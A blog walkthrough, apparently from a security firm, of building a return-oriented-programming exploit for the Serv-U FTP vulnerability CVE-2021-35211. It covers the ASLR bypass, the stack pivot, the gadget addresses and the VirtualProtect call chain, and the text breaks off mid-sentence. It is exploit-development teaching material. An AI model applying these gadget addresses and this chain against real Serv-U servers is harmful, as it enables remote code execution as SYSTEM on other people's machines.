# Walkthrough of Creating an Exploit for CVE-2021-35211

## Background
As part of our work on the [Cosmos platform](https://bishopfox.com/platform) (formerly known as CAST) we sometimes need to weaponize vulnerabilities to meet specific customer requirements. In this case we were asked "can you guys write an exploit for this?" and we were happy to oblige.

## The Vulnerability
In this blog, I'd like to share some of the thought process behind creating a ROP-based exploit for Serv-U FTP v15.2.3.717 on modern Windows systems. I'm not going to cover the root cause of the vulnerability here because the Microsoft research team did a good job of it in their [blog post](https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/). Please read that article first and then come back here if you're interested in how we arrived at the point of NattiSamson's PoC and our subsequent exploit.

We pick up at the point where Natti's PoC gives us a semi-reliable way to populate the `r9` register with an attacker-supplied value that is subsequently used by a `call r9` instruction. This gives us a way to control `rip` and theoretically execute arbitrary code in the context of Serv-U, which typically runs as a service as `NT AUTHORITY\SYSTEM`.

We'll keep the tooling simple. If you want to play along you'll need:

* **A disassembler**. In this example I used [Hopper Disassembler](https://www.hopperapp.com/), but IDA Pro, Ghidra, or anything else will do.
* **Radare2**. The Swiss army knife of assembly language! Get it from the [Radare2 website](https://rada.re/).
* **WinDBG**. I used WinDBG on Windows Server 2022 Datacenter; you can get it [here](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools).
* **Proof-of-Concept code**. The exploit I wrote is based on the PoC written by [NattiSamson](https://github.com/NattiSamson). The original code is here: [PoC](https://raw.githubusercontent.com/NattiSamson/Serv-U-CVE-2021-35211/main/CVE-2021-35211_PoC.py).
* **Serv-U-FTP v15.2.3.717**. Download it from the [Serv-U Download page](https://downloads.solarwinds.com/solarwinds/Release/SU/15.2.3/SU-FTP-Server-Windows-v15.2.3.zip).
* **Python 3**. Python 2 will probably work with some tweaks.

Note that I am *not* using [Mona](https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/) or other such tools to automate the exploit development process. I'm doing a lot of this manually to better demonstrate the steps involved in writing ROP exploits; perhaps in a later blog post I'll go over how to do this with automation tooling like Mona. 

If you don't care about the technical details and just want to grab the exploit, it's available [here](https://github.com/0xhaggis/CVE-2021-35211).

## Summarizing the Exploit Development
I started with NattiSamson's PoC that triggered the bug in Serv-U and placed a user-controllable value into `rip` via a `call r9` instruction. `r9` is a QWORD (8-byte / 64-bit) register, the contents of which can be controlled by passing a carefully constructed malicious payload during the initial SSH cryptographic handshake with Serv-U.

Let's break the exploit development down into chunks. This will be a [ROP exploit](https://hovav.net/ucsd/talks/blackhat08.html) and loosely gets constructed like so:

1. Figure out what address to put into `r9` in order to kickstart code execution
2. Defeat ASLR to enable the above
3. Pivot the stack pointer `rsp` to point at the ROP chain in our payload
4. Find the address of the function `kernel32.dll!VirtualProtect`, which I'll use to make the stack executable (RWX)
5. Identify useful ROP gadgets to do (4)
6. Build a ROP chain that calls `VirtualProtect` to change the stack's page protection from RW- to RWX
7. Reset the stack/registers to pre-exploit values (if necessary and feasible)
8. Add ROP gadgets to jump to shellcode on the newly executable stack

I may or may not stick to that order!

### Where to Jump? ASLR? Stack Pivot?
The first three above points are all intertwined, so I'll deal with them at the same time. The question is: What memory address should I put into `r9` in order to kickstart our ROP chain exploit? I must solve for:

* The stack pointer `rsp` *must* point to our ROP chain before the `call r9` returns with a `ret` instruction. This is because of the way `ret` works. Think of the `ret` instruction as an equivalent of `pop rax ; jmp rax` or more simply, `pop rip`, both of which pop a 64-bit address off the stack and jump to it. If you control the stack, you control the return address of every `ret` instruction in the future. 
* In other words: if `rsp` doesn't point to our ROP chain by the time `ret` is called, I'm hosed.
* Unfortunately, `rsp` does *not* point to our ROP chain at the time of the PoC's `call r9`, so our first ROP gadget *must* populate `rsp` with the address of our payload/ROP chain buffer and then call `ret`.
* Due to ASLR, most memory addresses will be different every time Serv-U is launched. I must find static addresses, at least until I get a proper foothold to query the runtime dynamically.
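The `ret` behavior described in the bullets above can be sketched as a toy model. This is only an illustration, not debugger output: the stack is a Python list, each list entry stands in for one 8-byte slot, and the addresses are made up.

```python
# Toy model: `ret` loads rip from the slot rsp points at, then advances rsp.
def run_rets(stack, count):
    """Simulate `count` consecutive ret instructions on a list-based stack."""
    rsp = 0                  # index of the current top of stack
    visited = []
    for _ in range(count):
        rip = stack[rsp]     # ret: rip = [rsp]
        rsp += 1             # ret: rsp += 8 (one slot in this model)
        visited.append(rip)
    return visited

# Hypothetical addresses, for illustration only.
controlled_stack = [0x1000, 0x2000, 0x3000]
print([hex(a) for a in run_rets(controlled_stack, 3)])  # ['0x1000', '0x2000', '0x3000']
```

Whoever chooses the contents of the list chooses every address the CPU "returns" to, which is why the stack pivot has to happen first.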

Whew. Tricksy. Fortunately the stars aligned on this bug and it's pretty easy to work around these problems. First up: ASLR. I can't do anything until I've worked around address space randomization.

### ASLR
I can't pivot the stack or reliably jump to a useful instruction until I've found predictable, repeatable addresses that are not subject to ASLR.

The first thing to do is see if `Serv-U.exe` or any of the bundled DLLs are compiled without ASLR support. The tool for the job is NetSPI's `PESecurity`, available from https://github.com/NetSPI/PESecurity. It's a PowerShell script that scans executable files for security flags and produces a concise report, like so:

```
PS C:\Users\Administrator\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\Administrator\Desktop> Get-PESecurity -directory 'C:\Program Files\RhinoSoft\Serv-U' -recursive

FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoNET.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoRES.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-RES.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Setup.exe
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : True
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Tray.exe
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : True
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True

FileName         : C:\Program Files\RhinoSoft\Serv-U\zlib1.dll
ARCH             : AMD64
DotNET           : False
ASLR             : False
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : N/A
ControlFlowGuard : False
HighentropyVA    : True
```

Holy smokes, that's a lot of non-ASLR binaries! For shame, SolarWinds. This means that `Serv-U.dll`, etc. will *always* be loaded into the same memory addresses, which means that I have reliable addresses from which to harvest ROP gadgets. 
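For readers without PowerShell to hand, the ASLR flag can also be read straight out of the PE header. The following is a minimal sketch and not how PESecurity itself is implemented; the function names are my own, and it assumes the whole file has been read into a `bytes` object.

```python
import struct

# Flag values from the PE/COFF DllCharacteristics field.
HIGH_ENTROPY_VA = 0x0020
DYNAMIC_BASE = 0x0040   # set when the image opts in to ASLR
NX_COMPAT = 0x0100      # set when the image is DEP-compatible
GUARD_CF = 0x4000

def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics word from a PE image's optional header."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)    # e_lfanew
    if image[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    optional_header = pe_offset + 4 + 20                     # signature + COFF header
    # DllCharacteristics sits 70 bytes into the optional header (PE32 and PE32+).
    (flags,) = struct.unpack_from("<H", image, optional_header + 70)
    return flags

def has_aslr(image: bytes) -> bool:
    """True when the DYNAMIC_BASE bit is set."""
    return bool(dll_characteristics(image) & DYNAMIC_BASE)
```

Calling `has_aslr()` on the bytes of a file such as `Serv-U.dll` should agree with the `ASLR` column in the report above.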

### Stack Pivot
As mentioned before, the stack pointer `rsp` doesn't point to our exploit payload buffer at the time `call r9` happens. This breaks everything because once the function at `r9` executes `ret`, the CPU will pop the return address off the stack at the address in `rsp` and `jmp` to it. In other words, execution resumes as normal. I can control `r9` and therefore control where the `call` jumps to, but I can't control where it returns to; I have to find a way to point `rsp` at our payload and return to our ROP chain using only a single ROP gadget.

It turns out that our payload is actually stored at the address stored in `rbp`. How do I know that? By examining the registers and the stack in a debugger at the point `call r9` is executed by the CPU. 

First the registers:
```
0:008> r
00 0000000d`09bfebf0 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
rax=0000000000000010 rbx=000001ed4d497f00 rcx=000001ed4d9126b8
rdx=000001ed4d9126c8 rsi=ffffffffffb627a8 rdi=0000000000000000
rip=00000000720b9636 rsp=0000000d09bfebf0 rbp=000001ed4d5a410a
 r8=000001ed4d497f00  r9=4141414141414100 r10=000001ed4d497f00
r11=000001ed4d5a40fa r12=000001ed4d9126c8 r13=0000000000000001
r14=ffffffffffc91a32 r15=000001ed4d474e80
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
```

We can see that the stack pointer and base pointer are nowhere near each other:
```
rsp = 0x00d09bfebf0
rbp = 0x1ed4d5a410a
```

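There was nothing of our payload at `rsp`'s memory address, but what about `rbp`? (The dump below was captured in a different debugging session, so its addresses differ from the register output above.)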
```
0:013> db @rbp l128
00000253`5badfa9a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaaa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaca  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfada  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfaea  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfafa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb0a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb1a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb2a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb3a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb4a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb5a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb6a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb7a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00000253`5badfb8a  41 41 41 41 41 41 41 41-00 00 00 00 00 00 00 00  AAAAAAAA........
00000253`5badfb9a  00 00 00 00 00 00 00 00-00 00 00 00 00 00 73 92  ..............s.
00000253`5badfbaa  bf a1 35 03 00 90 b8 34-5a 90 ff 7f 00 00 70 34  ..5....4Z.....p4
00000253`5badfbba  5a 90 ff 7f 00 00 00 22                          Z......"
```

Bingo! So first order of the day is to move the address in `rbp` to `rsp`. To do that I need a ROP gadget that does something like:

```
mov rsp, rbp 
ret
```

It's rarely that easy, but that's where we start. Using Radare2 to search for ROP gadgets is simple, particularly on architectures like x86-64, where instructions vary in length and can begin at any byte offset. That property lets us find gadgets that aren't even part of the compiled code. It's a cool concept, check it out. Consider the following code:

```
0x18005d485               498be3  mov rsp, r11
0x18005d488                   5d  pop rbp
0x18005d489                   c3  ret
```

The first instruction, `mov rsp, r11`, takes up three bytes `\x49\x8b\xe3` and starts at address `0x18005d485`. Therefore the next instruction is at an address 3 bytes higher at `0x18005d488`.

But what if I set the instruction pointer to address `0x18005d486`, which is between the two "valid" instruction addresses? The opcodes would be `\x8b\xe3\x5d\xc3`, which is a completely different set of instructions. You can use Radare2 to disassemble these opcodes like so:

```
% rasm2 -a x86 -b 64 -d 8be35dc3
mov esp, ebx
pop rbp
ret
```
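The same byte-offset trick can be reproduced without a disassembler. This small sketch only slices the five bytes from the listing above; the helper `ret_offsets` is a hypothetical name of mine and is far cruder than what Radare2 does.

```python
gadget = bytes.fromhex("498be35dc3")   # mov rsp, r11 ; pop rbp ; ret
base = 0x18005d485                      # address of the first byte, from the listing

# Starting one byte later skips the 0x49 REX prefix, changing the decoded instruction.
misaligned = gadget[0x18005d486 - base:]
print(misaligned.hex())                 # 8be35dc3

def ret_offsets(code: bytes):
    """Offsets of every 0xc3 byte; each one is a candidate gadget ending."""
    return [i for i, b in enumerate(code) if b == 0xC3]

print(ret_offsets(gadget))              # [4]
```

A gadget finder walks backwards from each candidate `ret` byte and tries to decode valid instructions at every preceding offset.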

Well, look at that! A completely different gadget. You can ask Radare2 to perform gadget searches byte-by-byte to uncover all possible permutations of instructions by using the `"/ad/a "` command like this:


```
% r2 Serv-U.dll
 -- Ask not what r2 can do for you - ask what you can do for r2
[0x1801a4184]> "/ad/a mov rsp;ret;"
[0x1801a4184]>
```

The above command `"/ad/a mov rsp;ret"` tells Radare2 to scan the `Serv-U.dll` file for instructions that match a `mov` followed by a `ret`, and in which the `mov` instruction is writing *something* to the `rsp` register. The stacked query terms are separated by semicolons and are expected to be regexes; the entire command must be inside double-quotes.

Sadly for us, the above Radare2 search returned no results. Ok, let's try to find a gadget that has some kind of `mov rsp, .*`, then any other instruction, and then a `ret`:

```
[0x1801a4184]> "/ad/a mov rsp;.*;ret;"
0x180059ffb               498be3  mov rsp, r11
0x180059ffe                   5d  pop rbp
0x180059fff                   c3  ret
0x18005d485               498be3  mov rsp, r11
0x18005d488                   5d  pop rbp
0x18005d489                   c3  ret
0x18005d986               498be3  mov rsp, r11
0x18005d989                   5d  pop rbp
0x18005d98a                   c3  ret
0x18005fa9a               498be3  mov rsp, r11
0x18005fa9d                 415e  pop r14
0x18005fa9f                   c3  ret
0x180063a5a               498be3  mov rsp, r11
0x180063a5d                   5f  pop rdi
0x180063a5e                   c3  ret
0x180064795               498be3  mov rsp, r11
0x180064798                   5f  pop rdi
0x180064799                   c3  ret
...omitted for brevity...
0x180196569               498be3  mov rsp, r11
0x18019656c                   5f  pop rdi
0x18019656d                   c3  ret
0x1801a167f               498be3  mov rsp, r11
0x1801a1682                   5f  pop rdi
0x1801a1683                   c3  ret
```

That's a LOT of matching gadgets! Remember, I want to put the address of our payload into `rsp`. Let's rule out any gadgets where `rbp` is popped off the stack - I'd like to avoid messing with more stack registers than absolutely necessary. I don't care if `rdi` gets messed up, so those gadgets could be useful so long as `r11` points to the location of our payload buffer on the stack. 

To check `r11`'s value I used WinDBG to attach to the Serv-U process and compare the value of `rbp` against `r11` at the time `call r9` is executed by the exploit:

```
(1c60.1c04): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
0:013> r
rax=0000000000000010 rbx=0000020058925d20 rcx=0000020058d1d688
rdx=0000020058d1d698 rsi=ffffffffffb5ee68 rdi=0000000000000000
rip=00000000720b9636 rsp=0000009dd2aff320 rbp=0000020058648b3a
 r8=0000020058925d20  r9=4141414141414141 r10=0000020058925d20
r11=0000020058648b2a r12=0000020058d1d698 r13=0000000000000001
r14=ffffffffff92b492 r15=000002005887c510
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
0:013>
```

We can see that:

```
rbp=0000020058648b3a
r11=0000020058648b2a
```

What good fortune! The `r11` register holds an address 16 bytes below `rbp`, which points exactly at our payload buffer. I can use the newly identified ROP gadget to perform the stack pivot, pop eight bytes off the "stack" (which is really our payload) into `rdi`, and then pop the next eight bytes off the stack into `rip`; given that I control the new stack, I therefore control the value of `rip`, which means I now have a means to pivot the stack and continue execution from our ROP chain.
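The arithmetic can be checked with the two register values from the dump above. The slot names are my own labels, and the sketch assumes a `mov rsp, r11 ; pop rdi ; ret` gadget as described.

```python
rbp = 0x0000020058648B3A
r11 = 0x0000020058648B2A

delta = rbp - r11
print(hex(delta))          # 0x10

# After `mov rsp, r11`:
rdi_slot = r11             # bytes 0..7 are consumed by `pop rdi`
rip_slot = r11 + 8         # bytes 8..15 are consumed by `ret` as the next rip
rsp_after = rip_slot + 8   # where rsp points once the gadget has returned
print(rsp_after == rbp)    # True
```

In other words, the gadget eats exactly the 16 bytes between `r11` and `rbp`, leaving `rsp` equal to `rbp` for the rest of the chain.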

I chose the gadget address of `0x18010391a` from those found by Radare2. It became the value placed into the payload buffer as our first ROP gadget address.

### Executing Shellcode: Find `Kernel32!VirtualProtect`
Now that I've pivoted the stack to our ROP buffer, I need to set up the conditions for executing shellcode. Step one: Make the memory pages in which our shellcode is stored readable, writable, and - most importantly - *executable.* Our shellcode is on the stack in our payload buffer, so that's what I need to make executable.

The function `VirtualProtect` is used to change the protection flags for regions of memory, which lets us set the stack to executable (RWX). I checked the import table of `Serv-U.dll`, but it didn't import `VirtualProtect`, so the easiest way of getting the correct address (direct reference) wouldn't work. Instead I have to use native Windows functions to derive the address by calling the equivalent of `GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualProtect")`.

We can see from the disassembler's import tables (Navigation / Imported Symbols in Hopper) that `Serv-U.dll` imports `GetModuleHandleW` from `kernel32.dll`:

![](https://i.imgur.com/1sq1NTs.png)

It also imports `GetProcAddress`:

![](https://i.imgur.com/AEOxxhm.png)

The address `0x1801c92c8` is a trampoline stub built into `Serv-U.dll` that, when jumped to, redirects execution to the real `kernel32!GetModuleHandleW` that's been mapped into Serv-U's process space by the operating system's library loader. The same applies for `0x1801c9590` and `kernel32!GetProcAddress`. In other words, the value stored at address `0x1801c92c8` is a pointer to the real `GetModuleHandleW` function.

Let's dereference it in the debugger and double-check that it matches the real address of `GetModuleHandleW` in this context. First, dereference the trampoline in `Serv-U.dll`:

```
0:026> u poi(0x1801c92c8)
KERNEL32!GetModuleHandleWStub:
00007ffd`19e4ce40 48ff2559370600  jmp     qword ptr [KERNEL32!_imp_GetModuleHandleW (00007ffd`19eb05a0)]
00007ffd`19e4ce47 cc              int     3
```

Awesome. Does the same apply to `GetProcAddress`?

```
0:026> u poi(0x1801c9590)
KERNEL32!GetProcAddressStub:
00007ffd`19e4a780 4c8b0424        mov     r8,qword ptr [rsp]
00007ffd`19e4a784 48ff25bd510600  jmp     qword ptr [KERNEL32!_imp_GetProcAddressForCaller (00007ffd`19eaf948)]
00007ffd`19e4a78b cc              int     3
```

Yes indeed! That has saved us a lot of hassle and I can write the ROP chain the "easy" way by calling known pointers to access the functions needed to locate `VirtualProtect`. In order to call the necessary functions I'll need to find some ROP gadgets that provide the necessary functionality.

### Identify ROP gadgets
I started by sketching out a rough plan of what I wanted to achieve.

* Stack pivot
* Set up the parameter needed when calling `moduleHandle = GetModuleHandleW(L"kernel32.dll")`
* Call it
* Set up the two parameters needed when calling `VirtualProtect = GetProcAddress(moduleHandle, "VirtualProtect")`
* Call it
* Set up the four parameters required for `VirtualProtect(stackAddress, size, attributes, &results)`
* Call it
* Load the address of our payload buffer's NOP sled + shellcode
* Restore the pre-exploit stack frame
* Jump to the shellcode 

It takes a bit of trial and error to build up the gadget chain because we're often limited to less-than-perfect gadgets. So I spent some time finding useful gadgetry. What constitutes "useful"? Here are a few ideas:

* Simple and short. E.g. `mov rax, rbx ; ret` is much better than `mov rax, rbx; mov rax, qword ptr [rax+10h]; pop rcx; ret` because the latter stomps on the values we want and it also messes with the stack due to the `pop` instruction. Simple is good in ROP. But if we can't find "perfect" gadgets (i.e. those that perform *only* the desired operation and a `ret`) then we have to settle for gadgets with extra baggage.
* Manipulation of argument-passing registers on x64. Gadgets that allow us to `pop` values off the stack into the four argument-passing registers (`rcx`, `rdx`, `r8`, and `r9`, respectively) are super useful for calling into functions. So for example these gadgets are solid gold:
    * `pop rcx ; ret`
    * `pop rdx ; ret`
    * `pop r8 ; ret`
    * `pop r9 ; ret`
* In this exploit there was no `pop r9` gadget available. Instead, I looked for the smallest possible non-perfect gadgets to load another register with the desired value and swap it into the `r9` register, like so:
    * `pop rax ; xchg r9, rax ; ret`
* Flow control gadgets like `jmp rax ; ret` or `call rbx ; ret` can be chained together like so:
    * `pop rax` followed by
    * `jmp rax` or `jmp qword ptr [rax]`
* Gadgets that dereference the registers are super useful when bouncing off trampolines like the ones I have for `GetModuleHandleW` and `GetProcAddress`. For example:
    * `mov rax, qword ptr [rax]`. Reads the value at the memory address in `rax` and stores it in the `rax` register.
    * For example, if `rax=0x123456789` then the above instruction reads the 8 bytes at memory address `0x123456789` and stores that value in the `rax` register.

I spent some time collecting gadgets and then used them to construct a real ROP chain. Sometimes it doesn't work out and you need to spend forever thinking up alternative ways of doing the job. For example, I spent *hours* trying to find an easy way to put arbitrary values in the `r9` register when calling into `VirtualProtect`. Eventually I settled on a two-gadget chain that populated `r9` via `rax`, like so:

```
# Gadget 1
pop rax         # we control the stack, so we can control the value popped into rax
ret

# Gadget 2
xchg rax, r9    # tadaaaa
adc al, 0       # Adds the carry flag to al; harmless here as long as the value left in rax is not needed
add rsp, 0x38   # Effectively a NOP with consequences: stack pointer increases by 0x38 bytes.
ret             # The address popped off the stack by the ret instruction needs to be 0x38 bytes further up our payload/stack than it normally would be. 
```

The double-gadget was a compromise because I really didn't want to have 0x38 bytes of my payload eaten up by `add rsp, 0x38`, but it did the job and was the best I had, so I went with it.
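To see what the `add rsp, 0x38` costs in payload space, the offsets can be worked out by hand. This is a back-of-the-envelope sketch rather than code from the exploit; `next_return_offset` is a hypothetical helper and offset 0 is taken to be the slot holding the value destined for `rax`.

```python
SLOT = 8  # bytes per stack slot on x64

def next_return_offset(start, pops, rsp_adjust):
    """Offset from which a gadget's final `ret` reads its return address."""
    return start + pops * SLOT + rsp_adjust

# Gadget 1: pop rax ; ret  (rsp starts at offset 0)
ret1 = next_return_offset(0, pops=1, rsp_adjust=0)
# Gadget 2: xchg rax, r9 ; adc al, 0 ; add rsp, 0x38 ; ret
# It starts with rsp just past the slot that gadget 1's ret consumed.
ret2 = next_return_offset(ret1 + SLOT, pops=0, rsp_adjust=0x38)

print(hex(ret1), hex(ret2))   # 0x8 0x48
print(0x38 // SLOT)           # 7 filler slots are skipped
```

So the address of the gadget that follows has to sit 0x48 bytes after the `rax` value, with seven 8-byte slots of filler in between.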

### Call GetModuleHandleW
The `GetModuleHandleW` function is defined as:

```
HMODULE GetModuleHandleW(
  [in, optional] LPCWSTR lpModuleName
);
```

It returns a handle that identifies the module (DLL, executable, etc.) in memory; in practice the handle is a pointer to the base address at which the module is loaded. The name of the module must be specified as a "wide" string, which uses 16 bits per character instead of ASCII's eight bits per character. For example:

ASCII:
```
"kernel32" = \x6b\x65\x72\x6e\x65\x6c\x33\x32
```

Wide String:
```
"kernel32" = \x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\x00
```
```
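The two encodings are easy to reproduce in Python, where a Windows wide string corresponds to UTF-16 little-endian. A quick sketch (`bytes.hex` with a separator needs Python 3.8 or later):

```python
name = "kernel32"

ascii_bytes = name.encode("ascii")
wide_bytes = name.encode("utf-16-le")

print(ascii_bytes.hex(" "))  # 6b 65 72 6e 65 6c 33 32
print(wide_bytes.hex(" "))   # 6b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00
print(len(ascii_bytes), len(wide_bytes))  # 8 16
```

Note that a wide string in memory is terminated by a two-byte NUL (`\x00\x00`) rather than a single zero byte.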

Handily enough, there is a wide string version of `kernel32` in the `Serv-U.dll` binary! It's located at `0x180313230`, as shown here in Hopper:

![](https://i.imgur.com/ExQmzI2.png)

Note that it's denoted as type `dw`, which is a wide string. Checking the result in the hex editor confirms that this is really a wide string:

![](https://i.imgur.com/lAcWzXn.png)

Excellent. All it takes to call `GetModuleHandleW(L"kernel32.dll")` is the following pseudo-code:

```
pop rcx         # We place the value 0x180313230 (address of kernel32 string) on the stack to be popped into rcx
pop rax         # We place the value 0x1801c92c8 (address of GetModuleHandleW trampoline) on the stack to be popped into rax
jmp [rax]       # Dereference rax and jump to the resulting address, which is the real address of GetModuleHandleW
mov rcx, rax    # Save the returned handle in rcx for later
```

The handle for `kernel32.dll` is returned in the `rax` register, which we can save for later use. In the exploit I save it into a writable area of memory in Serv-U's `.data` segment that I treat as a scratchpad for "variables" that hold data temporarily.

### Call GetProcAddress
The `GetProcAddress` function is defined as:

```
FARPROC GetProcAddress(
  [in] HMODULE hModule,
  [in] LPCSTR  lpProcName
);
```

The first parameter is the handle I obtained from `GetModuleHandleW`. The second is the name of the function I want to find: `VirtualProtect`. This time the string is expected to be ASCII, not wide. Unfortunately, there is no NULL-terminated "VirtualProtect" string in the Serv-U binaries, so I need to create my own using the stack. 

The first step is to find a writable memory address in Serv-U's `.data` segment to which I can write a string. I used Hopper to look through the data segment for a section that was not cross-referenced to any code; the assumption is that the memory area is truly unused. Pseudo-code is as follows: 

```
# Write "VirtualProtect\x00\x00" (16 bytes) to an unused address in .data
# Split the task so that two 8-byte chunks are written consecutively.

pop rdx         # An unused address in Serv-U's data segment gets popped into rdx. 
pop rax         # Pop the value 0x506c617574726956 ("VirtualP" little-endian) off the stack.
mov [rdx], rax  # Write "VirtualP" to the first 8 bytes of our .data memory chunk.

pop rdx         # Pop the address of the next 8 bytes of .data memory into rdx. 
pop rax         # Pop "rotect\x00\x00" off the stack into the rax register.
mov [rdx], rax  # Append "rotect\x00\x00" to our memory chunk, making a complete "VirtualProtect\x00\x00" string.
```
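The two 8-byte values that get popped into `rax` can be derived with `struct`. This is just a sketch of the arithmetic, not a piece of the exploit itself:

```python
import struct

# Pad the 14-character name with NUL bytes to exactly 16 bytes.
name = b"VirtualProtect".ljust(16, b"\x00")

# Interpret the buffer as two little-endian 64-bit integers.
first, second = struct.unpack("<QQ", name)
print(hex(first))    # 0x506c617574726956
print(hex(second))   # 0x746365746f72

# Writing both values back in little-endian order recreates the string.
assert struct.pack("<QQ", first, second) == name
```

The first value matches the constant quoted in the pseudo-code; the second carries the two trailing NUL bytes in its upper 16 bits, which is what terminates the string.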

Now I can call `GetProcAddress`:

```
# Assume rcx contains the value returned by GetModuleHandleW, the handle to kernel32.dll
# Assume rdx contains the address of the string "VirtualProtect\x00"
pop rax         # Pop 0x1801c9590 off the stack (the address of the GetProcAddress trampoline)
jmp [rax]       # Jump to GetProcAddress(handle, "VirtualProtect\x00")
# The address of the VirtualProtect function is returned in rax
```

Phew! I now have the address of `VirtualProtect` in `rax`.

### Calling VirtualProtect
The `VirtualProtect` function is defined as:

```
BOOL VirtualProtect(
  [in]  LPVOID lpAddress,       // Starting address of memory to make executable (rounded down to nearest 4k page boundary).
  [in]  SIZE_T dwSize,          // Number of bytes to make executable (rounded up to nearest 4k page boundary).
  [in]  DWORD  flNewProtect,    // Protection flags. In this case 0x40 = RWX.
  [out] PDWORD lpflOldProtect   // Return results in this variable. Must be a writable memory address!
);
```

Remember that the parameters are passed to this function in the `rcx`, `rdx`, `r8`, and `r9` registers, respectively. In this case:

```
rcx = Address of our payload buffer (i.e. the current stack address)
rdx = 0x2000 (8kB or two 4k memory pages)
r8  = 0x40 (readable, writable, executable)
r9  = Address from .data segment of Serv-U
```
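Because the protection change applies to every page that contains at least one byte of the requested range, an unaligned start address can touch one page more than the size alone suggests. A worked example, using the `rbp` value from the earlier register dump purely as a sample address (`pages_touched` is a hypothetical helper):

```python
PAGE = 0x1000  # 4k pages

def pages_touched(address: int, size: int):
    """Return (first_page, last_page, count) for the range [address, address + size)."""
    first = address & ~(PAGE - 1)
    last = (address + size - 1) & ~(PAGE - 1)
    return first, last, (last - first) // PAGE + 1

first, last, count = pages_touched(0x0000020058648B3A, 0x2000)
print(hex(first), hex(last), count)   # 0x20058648000 0x2005864a000 3
```

With a page-aligned address the same 0x2000 bytes would cover exactly two pages.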

The second and third parameters are dead easy: Just pop them off the stack!

```
pop rdx         # Pop 0x2000 off the stack
pop r8          # Pop 0x40 off the stack
```

Getting the last argument is slightly trickier because we have no `pop r9` gadget to work with; instead the compound gadget is used:

```
# 1st gadget
pop rax         # Pop writable address off the stack into rax
ret

# 2nd gadget
xchg rax, r9    # Swap rax and r9 so that r9 now contains the writable address
adc al, 0       # Extra crap instruction does effectively no operation
add rsp, 0x38   # This part of the gadget moves the stack pointer up 0x38 bytes. 
                # We account for this in our exploit by skipping 0x38 bytes of our 
